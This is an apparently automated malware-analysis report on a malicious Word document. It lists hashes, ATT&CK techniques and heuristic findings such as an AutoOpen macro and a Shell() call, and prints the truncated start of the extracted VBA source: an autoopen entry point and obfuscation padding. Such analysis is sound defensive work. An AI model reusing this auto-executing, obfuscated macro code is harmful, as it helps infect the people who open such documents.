Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d9c9e1fece032140…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 89.0 KB
Created: 2017-08-31 13:22:00
Authoring application: Microsoft Office Word
First seen: 2018-06-20
MD5: 890ce730a3cf43f43039f114744df924
SHA-1: 19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a
SHA-256: d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91
Risk score: 202

Malware Insights

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present, and the macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious content. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports this assessment.

Heuristics (6 findings)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected [medium; OLE_VBA_MACROS; 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15175 bytes
SHA-256: a3b789a377a46bddf4c208fa481a93597586390e694508658a317f43998fd736

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub autoopen()
mFAVwZDEr
End Sub

Function KvRCBMNS()
Dim LMymZeBnT(2529)
LMymZeBnT(1446) = 8729 + 4015 / 7486 / 6644 / 2785 - 4156 + 1671 + 1621
 LMymZeBnT(175) = 6727 + 3749 / 2084 / 6651 / 2226 - 4594 - 2193 + 7969
LMymZeBnT(561) = Bvhvbny
 LMymZeBnT(2449) = GrgGzTyygzg
 LMymZeBnT(1799) = kDeGvDeHBEd
 LMymZeBnT(765) = MwASNGy
 LMymZeBnT(2210) = VcVCSVcBZGR
 LMymZeBnT(2285) = pSsyLnr
 LMymZeBnT(1072) = LaCbgNn
 LMymZeBnT(138) = XGZbySUN
 LMymZeBnT(2342) = PrUzZbaXhNR
 LMymZeBnT(763) = zErXbTBtP
 LMymZeBnT(239) = HdtwfkN
 LMymZeBnT(2464) = dppBDCapf
 LMymZeBnT(2404) = UTNnrHvZh
 LMymZeBnT(435) = zhnYZsSx
End Function
Function zxkKZatS()
Dim MUSDsdTpm(8023)
MUSDsdTpm(1547) = 8507 + 3715 + 7390 / 1139 - 7686 - 1394 - 3729 + 5591 + 6346 + 3830
 MUSDsdTpm(5496) = 3179 + 1176 / 7152 - 7866 + 8387 + 7334 + 3666
 MUSDsdTpm(6901) = 3699 + 464 / 2847 / 8537 - 1494 - 4533 - 7135 + 5793 + 991
MUSDsdTpm(2356) = BNVUASu
 MUSDsdTpm(5811) = pfxyacFHhV
 MUSDsdTpm(4778) = nfcVuNST
 MUSDsdTpm(3553) = KKsAPpcZpey
 MUSDsdTpm(6172) = GgertpH
 MUSDsdTpm(3112) = ecTDmEyRUr
 MUSDsdTpm(4214) = aNmezFdLCmu
 MUSDsdTpm(6856) = HcfUURfCg
 MUSDsdTpm(2833) = WuNtuvWUw
 MUSDsdTpm(2854) = xBwvyYZeNk
 MUSDsdTpm(818) = KuCetnGYMS
 MUSDsdTpm(3710) = ADEFKKLExy
 MUSDsdTpm(6523) = caNmUmfBS
 MUSDsdTpm(7145) = TDDMxWGeV
 MUSDsdTpm(4932) = nAYPVLTzHP
 MUSDsdTpm(4723) = MUnbKhhrM
 MUSDsdTpm(2494) = zLeZyXb
 MUSDsdTpm(4785) = aUUbaHB
 MUSDsdTpm(6003) = eLEUnGcHkTH
 MUSDsdTpm(4097) = FgbKwZMY
 MUSDsdTpm(2916) = tnckDDSYY
 MUSDsdTpm(4307) = WHTZHaev
 MUSDsdTpm(6864) = chDaYNWmP
 MUSDsdTpm(2193) = zXxtNNRpD
 MUSDsdTpm(2563) = sbAXRGR
 MUSDsdTpm(6124) = PruYVpHa
 MUSDsdTpm(4923) = VMSzhbAdrVP
 MUSDsdTpm(3938) = bBzmAYNDR
 MUSDsdTpm(1034) = BgFXfTr
 MUSDsdTpm(2729) = xtFvsAKB
End Function
Function vwewdzmCG()
Dim dEUUeywwRMF(9690)
dEUUeywwRMF(741) = 1224 + 2152 + 5852 + 9540 / 2903 / 6527 - 9406 - 4708 + 1567 + 2937
 dEUUeywwRMF(7976) = 1014 + 7679 + 3864 + 1676 / 5996 / 3882 - 161 - 4895 + 4065 + 6909
dEUUeywwRMF(1751) = tYazbXxCNT
 dEUUeywwRMF(2776) = NuDCsTAPLPk
 dEUUeywwRMF(1652) = ebvDZPdpZsy
 dEUUeywwRMF(4913) = CUNZMYe
 dEUUeywwRMF(8863) = muZhmRr
 dEUUeywwRMF(5853) = uGsbefvYXRP
 dEUUeywwRMF(9372) = GsVazkZS
 dEUUeywwRMF(3478) = wUmUtLhPy
 dEUUeywwRMF(5719) = egzYLLVHD
 dEUUeywwRMF(3811) = RwfzfLZysD
 dEUUeywwRMF(9051) = ttdrMdsmykS
 dEUUeywwRMF(9395) = ztXFkXHNseL
 dEUUeywwRMF(1518) = cvYaAvhk
 dEUUeywwRMF(4598) = PNWXuHhs
 dEUUeywwRMF(2545) = svkArnN
 dEUUeywwRMF(7865) = szvzSgamBf
 dEUUeywwRMF(7016) = hDwHTMuptC
 dEUUeywwRMF(6991) = WMZUUYPwhZ
 dEUUeywwRMF(542) = hpWXAwLmLYv
 dEUUeywwRMF(2487) = HBeVWrpAB
 dEUUeywwRMF(4899) = CPRYAdHwkTZ
 dEUUeywwRMF(8603) = mFCdEgmrgr
 dEUUeywwRMF(878) = YWPDTErH
 dEUUeywwRMF(8488) = vnMHNnRnT
 dEUUeywwRMF(9551) = WnPmpFADzEX
 dEUUeywwRMF(9252) = azxrthzrfP
 dEUUeywwRMF(5148) = rmYSZsceykH
 dEUUeywwRMF(8137) = MEfWGVkRHfT
 dEUUeywwRMF(9256) = AMvBduVrX
 dEUUeywwRMF(1474) = CSERTFBTLe
End Function
Function VWLBafszR()
Dim RutsTCMXc(5215)
RutsTCMXc(2810) = 8562 + 4583 / 4600 / 3484 - 5235 + 7632 + 2021 + 4246
 RutsTCMXc(2322) = 2401 + 8364 / 9723 / 8683 - 2930 - 2116 - 6859 + 2276
RutsTCMXc(1777) = muWFmKYxd
 RutsTCMXc(3509) = RnXZbXGP
 RutsTCMXc(2132) = uFYaLHHRa
 RutsTCMXc(2659) = MVxPwWed
 RutsTCMXc(1382) = MfBFrLSEZsF
 RutsTCMXc(279) = epAYkRUaV
 RutsTCMXc(2919) = rBAPsgdUZ
 RutsTCMXc(1271) = BydDuUZ
 RutsTCMXc(4350) = eXPPkeHc
 RutsTCMXc(4191) = CTKSnCpP
 RutsTCMXc(4786) = BNYVMbtApGu
 RutsTCMXc(531) = xGnSxTRUCVa
 RutsTCMXc(622) = dYWMfDUyyK
 RutsTCMXc(301) = aGVZYRSnx
 RutsTCMXc(3437) = bEGAMUGxvgk
 RutsTCMXc(3741) = KxxfKfX
 RutsTCMXc(1193) = ptuahxcHBz
 RutsTCMXc(1852) = rmCaPECXAu
 RutsTC
... (truncated)